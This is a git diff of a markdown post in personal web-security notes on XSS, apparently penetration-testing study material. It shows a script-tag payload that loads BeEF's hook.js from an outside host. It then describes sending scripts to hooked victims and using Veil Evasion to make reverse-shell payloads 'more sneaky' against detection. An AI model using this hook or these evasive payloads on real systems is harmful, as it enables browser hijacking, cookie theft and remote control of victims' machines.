--- a/_posts/notes/web/2021-12-12-xss.md
+++ b/_posts/notes/web/2021-12-12-xss.md
@@ -39,8 +39,22 @@ Then we send others cookie to our http server:
 # Tools
 
 ## BeEF
-We can use BeEF to capture traffic with XSS.
+We can use **BeEF** to capture traffic with XSS.
 In a XSS we send:
 {% highlight html %}
 <script src="http://192.168.1.1:3000/hook.js"></script>
 {% endhighlight %}
+
+##### for both, reflected and stored
+
+Then in the **BeEF** panel (http://localhost:3000/hook.js) we can registred the IP who open the page.
+
+We can use the **commands** tab to send scripts to a victim.
+
+## Veil Framework
+First we need to install [Veil](https://github.com/Veil-Framework/Veil/).
+After the installation we need to start Veil.
+
+We can list everything with the command **list**, use the **Evasion** option. Then **list** again to get all the reverse shell payload.
+It is recommendable to change the variables to be more *sneaky*.
+##### similar use as metasploit
